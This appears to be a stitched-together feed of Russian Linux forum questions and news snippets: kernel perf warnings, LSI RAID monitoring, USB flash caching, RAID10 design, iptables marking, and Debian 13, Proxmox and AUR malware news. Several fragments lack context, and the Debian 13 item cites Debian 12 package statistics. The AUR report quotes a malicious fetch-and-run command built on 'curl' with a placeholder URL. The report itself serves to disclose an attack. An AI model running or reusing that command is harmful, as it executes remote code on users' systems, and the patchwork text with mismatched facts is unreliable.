RunaWFE Free — это свободная российская система управления бизнес-процессами и административными регламентами. Написана на Java, распространяется под открытой лицензией LGPL. RunaWFE Free использует как собственные решения, так и некоторые идеи проектов JBoss jBPM и Activiti, содержит большое количество компонентов, задача которых обеспечить удобную работу конечного пользователя.
Это дополнительная прослойка поверх SLUB'а, которая будет кэшировать массивы данных для каждого CPU в отдельности, за счёт чего ожидается прирост производительности.
Виртуалка на KVM крутися, Debian 8.
С недавних пор в kernel log начали проскакивать записи
Jan 22 05:22:21 mail kernel: [ 151.893664] perf interrupt took too long (2620 > 2500), lowering kernel.perf_event_max_sample_rate to 50000
Jan 22 05:33:49 mail kernel: [ 840.194885] perf interrupt took too long (5074 > 5000), lowering kernel.perf_event_max_sample_rate to 25000
Jan 22 05:40:08 mail kernel: [ 1218.770828] perf interrupt took too long (10056 > 10000), lowering kernel.perf_event_max_sample_rate to 12500
Немогу понять насколько они критично для работы сервера и его безопасности. Можете пояснить что это значит.
На одних форумах панику поднимают, на других говоря болта забей.
До недавнего времени там стоял LSI HBA, который мониторился ОК с заббиксом с помощью sas2ircu. Но вот, я перешел на аппаратный рейд LSI 9271-8i, и мониторинг перестал мониторить. Как поднять мониторинг снова?
Немного о железе:
user@host:~$ sudo /opt/MegaRAID/MegaCli/MegaCli64 -AdpAllInfo -aALL | less
Adapter #0
==============================================================================
Versions
================
Product Name : LSI MegaRAID SAS 9271-8i
Serial No : SK92678633
FW Package Build: 23.34.0-0019
Mfg. Data
================
Mfg. Date : 06/10/19
Rework Date : 00/00/00
Revision No : 38001
Battery FRU : N/A
Image Versions in Flash:
================
BIOS Version : 5.50.03.0_4.17.08.00_0x06110200
WebBIOS Version : 6.1-76-e_76-Rel
Preboot CLI Version: 05.07-00:#%00011
FW Version : 3.460.115-6465
NVDATA Version : 2.1507.03-0162
Boot Block Version : 2.05.00.00-0010
BOOT Version : 07.26.26.219
Pending Images in Flash
================
None
PCI Info
================
Controller Id : 0000
Vendor Id : 1000
Device Id : 005b
SubVendorId : 1000
SubDeviceId : 9271
Host Interface : PCIE
ChipRevision : D1
Link Speed : 0
Number of Frontend Port: 0
Device Interface : PCIE
...
...
О доступных в системе версиях утилиты sas2ircu:
root@host:~# sas2ircu-old LIST
LSI Corporation SAS2 IR Configuration Utility.
Version 5.00.00.00 (2010.02.09)
Copyright (c) 2009 LSI Corporation. All rights reserved.
SAS2IRCU: Discovery Error.
root@host:~# sas2ircu LIST
LSI Corporation SAS2 IR Configuration Utility.
Version 16.00.00.00 (2013.03.01)
Copyright (c) 2009-2013 LSI Corporation. All rights reserved.
SAS2IRCU: MPTLib2 Error 1
root@host:~# sas2ircu-p20 LIST
LSI Corporation SAS2 IR Configuration Utility.
Version 20.00.00.00 (2014.09.18)
Copyright (c) 2008-2014 LSI Corporation. All rights reserved.
SAS2IRCU: MPTLib2 Error 1
root@host:~#
Спустя семь лет разработки представлена версия LKRG 1.0.0. LKRG (Linux Kernel Runtime Guard) — модуль ядра Linux, предназначенный для проверки целостности ядра во время его работы и для обнаружения попыток использования уязвимостей.
Сегодня, 6 сентября 2025 года, вышел очередной релиз открытого симулятора электронных схема Qucs-S. В качестве движка моделирования для Qucs-S можно использовать Ngspice (рекомендуется и устанавливается по зависимостям) или QucsatorRF (для моделирования СВЧ схем, поставляется вместе с программой).
Есть флешка, Kingston 2Гб взятая на поиграццо (на недельку - чисто инфу перегнать :-). В соседнем виндовом компе выдала следущие показатели: чтение ~9 мб/сек, запись ~3мб/с. Отформатирована в Фат16 размер блока 32кб, менять файловую систему возможности нет - читать флеш надо под масдаем, а фат32 еще тормознее чем 16-й.
Суть проблеммы - при монтировании флешки инфа читается с нее с тойже скоростью, что и в винде (~9-10 мб/сек). Косяк при записи - без опции sync - линух закидывает данные в кеш, а потом медленно и неспеша записывает это все на флешку, что не есть гут (привычка выдергивать не размонтируя, особенно когда спешишь). Руками делать unmount, и ждать пока он сбросит кеш - нехочется. Хочется чтоб писал сразу. С опцией sync - выдает скорость порядка 10-30 кб/с.
Как я понял, косяк со скоростью связан с тем, что на флешку за раз пишется 512 (или даже больше?) байт, а линух пытается писать меньшими кусочками. И как результат один и тотже сектор переписывается и перечитывется несколько раз, что сильно снижает скорость.
Начитал в нете (http://gentoo.ru/node/4961):
В ядре 2.6.19 появился для фат32 новый ключик -flush который говорит мол скидывать кеш как можно быстрее без задержек.
Но делу это не помогло - первые 99% записи пролетают быстро, а потом система долго висит на последнем проценте, ожидая пока даннве из кеша реально запишутся на флеху. Неаккуратненько както.
Вопрос знатокам: как получить запись на флешку без кеширования, но с приемлемой скоростью?
Вышло обновление пакета программ для работы в Фидонет. Комплект содержит набор последних версий классических программ ФИДО (только свободное ПО): мейлер для получения почты через Интернет, тоссер для обработки сообщений и редактор сообщений.
Кратко об основных изменениях в этой версии:
улучшена поддержка платформ: Linux, Android (в Termux), FreeBSD, NetBSD, OpenBSD и Dragonfly BSD.
конфигуратор пакета теперь позволяет настроить адрес прокси-сервер для работы мейлера binkd и загрузки обновлений списка узловых станций (нодлиста);
в узловых конфигурациях для мейлера binkd, если он собран с поддержкой perl, автоматически включаются perl-hooks для разбора поступивших обновлений списка узловых станций (нодлиста);
для отчетов о состоянии узла ФИДО, которые публикуются в эху .robots, написана новая утилита sysmon (как отдельный проект здесь: https://sysmon.sourceforge.io). Она выводит информацию о текущем состоянии операционной системы и для работы не требует привилегий суперпользователя;
Комплект fidoip прост в настройке. Используя его, вы можете легко подключиться к Фидонет (предварительно нужно связаться с системными операторами сети, список которых приведен в документации), а также быстро поднять свой узел ФИДО.
Имеется сервер с Debian и четыре жёстких диска: два старых и два новых (попарно из одинаковых партий).
Планирую из всего этого собрать software raid10. Как лучше это сделать?
Использовать raid10 от mdadm и добавить в него все диски.
Собрать вручную два raid1 из пар «старый диск + новый диск» и объединить их в raid0.
Собрать вручную два raid1 из пар «старый диск + новый диск» и объединить их с помощью LVM.
Важно:
в будущем может появиться необходимость расширить массив путём добавления ещё нескольких дисков (суммарно их всегда будет чётное количество);
вероятно, имеющиеся диски будут постепенно заменены на HDD большего объёма и понадобится расширить доступный объём в RAID10;
я знаю про существование raid0+1, его плюсы и минусы - данный вариант к данной теме не относится.
Вопросы:
Насколько сильно будет отличаться производительность операций чтения/записи в трёх случаях?
Чем на практике отличаются указанные варианты?
Какой вариант является самым надёжным?
Какой вариант является самым производительным?
Какой вариант порекомендуете на основании личного опыта с учётом требований к возможностям расширения?
3–5 октября в Институте программных систем РАН в Переславле-Залесском Ярославской области пройдёт XXI конференция разработчиков свободного программного обеспечения (OSSDEVCONF). На мероприятии соберутся разработчики и энтузиасты свободного ПО и открытого аппаратного обеспечения, чтобы обсудить новейшие достижения в области СПО, OSHW и перспективы их развития, наладить личные и профессиональные контакты и обменяться опытом, инициировать создание новых проектов. Формат конференции предполагает открытую встречу докладчиков и слушателей, а также личное общение.
Microsoft официально открыла исходный код своей первой версии BASIC для процессора MOS 6502, который десятилетиями существовал лишь в виде утечек, музейных копий и неофициальных сборок. Теперь он опубликован под лицензией MIT и доступен для изучения и модификации.
Помогите понять одну вещь.
Вот допустим я создаю две дополнительные таблицы маршрутизации, чтобы часть трафика пускать через другие шлюзы следующим образом:
ip route add default table 2 via 10.68.*.* dev eth0
ip rule add fwmark 2 table 2
ip route add default table 3 via 100.127.*.* dev ppp0
ip rule add fwmark 3 table 3
Где должны маркироваться пакеты при условии, что роутится через 3 таблицы должен как локальный трафик, так и проходящий.
Что-то подсказывает, что правила MARK должны быть одновременно в mangle-PREROUTING и mangle-OUTPUT, но вот открываю схему прохождения пакетов https://upload.wikimedia.org/wikipedia/ru/thumb/f/f4/Iptables-traversal.svg/8... и вижу, что для проходящих пакетов перед routing decision находится сразу после mangle-PREROUTING, так что всё должно быть верно. А вот для локальных routing decision стоит перед mangle-OUTPUT так что похоже оно так не взлетит. Как же тогда правильно?
Perl-Conf.Ru/25 — это ежегодная встреча Perl-разработчиков в России. В 2025 г. конференция пройдёт в субботу 27 сентября. Happy birthday to Larry!
Миссия Perl-Conf.Ru — поддерживать российское Perl-сообщество, способствовать обмену опытом и лучшими практиками, быть площадкой для общения коллег, аккумулировать экспертизу по Perl.
С сентября 2026 года в ряде стран (Бразилия, Сингапур, Индонезия, Таиланд) будет запрещено устанавливать неподписанные приложения в Android. Разработчикам приложений потребуется регистрироваться в Google с предоставлением адреса, телефона, и, вероятно, скана паспорта или другого официального документа. Предлагаемая мера призвана бороться с malware, устанавливаемым пользователями самостоятельно со случайных сайтов из Интернета.
С 2027 года планируется распространить эту практику на остальные страны.
Чуть более, чем через 2 года после выхода Debian 12, вышел новый релиз одного из самых долгоживущих на текущий момент (более 30 лет!) дистрибутивов, который получил кодовое имя «trixie». Этот стабильный релиз, как и предыдущий, будет поддерживаться в течение 5 последующих лет.
К сожалению, в этом релизе мы потеряли поддержку множества архитектур, главным образом, 32-битных, в том числе остающейся второй по популярности среди пользователей Debian архитектуры i386. Тем не менее, появилась поддержка одной новой архитектуры — riscv64. Впервые c 2000 года поддерживается всего 6 архитектур:
amd64
aarch64 (ARM64)
ARMv7
ppc64el
riscv64
s390x
Также есть ограниченная поддержка архитектуры armel, но без debian-installer и только для одноплатников Raspberry Pi 1, Zero и Zero W.
В выпуск Debian 12 добавлено 14 100 новых пакетов, а общее число пакетов достигло 69 830. По тем или иным причинам 8 840 пакетов были удалены. 44 326 пакетов обновлены в этом выпуске. Общий объем пакетов в Debian «bookworm» составляет 403 гигабайт и содержит 1 463 291 186 строк исходного кода.
Версии основных пакетов в Debian 13:
Apache: 2.4.64
Bash: 5.2.37
BIND: 9.20
Cryptsetup 2.7
Curl/libcurl: 8.14.1
Emacs: 30.1
Exim: 4.98
GCC: 14.2
GIMP: 3.0.4
GnuPG: 2.4.7
Inkscape: 1.4
Glibc: 2.41
LLVM/Clang: 19 (по умолчанию), 17 и 18 доступны в репозитоиях
MariaDB: 11.8
Nginx: 1.26
OpenJDK: 21
OpenLDAP: 2.6.10
OpenSSH: 10.0p1
OpenSSL: 3.5
Perl: 5.40
PHP: 8.4
Postfix: 3.10
PostgreSQL: 17
Python 3: 3.13
Rustc: 1.85
Samba: 4.22
Systemd: 257
Vim: 9.1
Ядро Linux обновлено до версии 6.12.
Версии окружений рабочего стола в Debian 13:
GNOME 48
KDE Plasma 6.3
Xfce 4.20
MATE 1.26
LXQt 2.1.0
LXDE 13 (0.99.3)
Для поддерживаемых архитектур официально есть возможность обновиться с предыдущего стабильного выпуска Debian 12 до Debian 13.
Опубликован релиз Proxmox Virtual Environment 9.0 - специализированного дистрибутива на базе Debian GNU/Linux для развёртывания и обслуживания виртуальных серверов на KVM и LXC, позиционируемого как альтернатива VMware vSphere, Microsoft Hyper‑V и Citrix Hypervisor. Управление - через web‑интерфейс, есть встроенное резервное копирование, кластеризация и live‑migration.
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоноснаяссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.
Давно не было ничего нового в рубрике «дурачок-мейнтейнер npm», и вот, наконец, новая порция обсёра. На этот раз пострадал пакет под супер-оригинальным названием «is» (2.7млн скачиваний в неделю!). Злоумышленник получил доступ к аккаунту через банальную хакер-рыбалку…
В ветку Android Canary добавлена возможность запуска графический приложений linux. Запуск осуществляется через приложение Linux Terminal, позволяющее запустить в окружении Android виртуальную машину с Debian GNU/Linux, в которой можно выполнять обычные Linux-приложения.
Функциональность виртуальной машины c Linux развивается в рамках проекта Ferrochrome. В гостевом окружении запускается Debian GNU/Linux 12. Для виртуализации используется Android Virtualization Framework, реализованный на базе гипервизора KVM и инструментария crosvm. Графическое окружение использует протокол Wayland и основано на композитном сервере Weston. Запуск приложений, собранных для X11, производится при помощи DDX-компонента XWayland, например, продемонстрирован запуск текстового редактора Gedit.
Есть принципиальная возможность использовать аппаратное ускорение графики на основе виртуального GPU Virgil3D для QEMU/KVM. В качестве иллюстрации продемонстрирован запуск doom. По умолчанию аппаратное ускорение отключено.
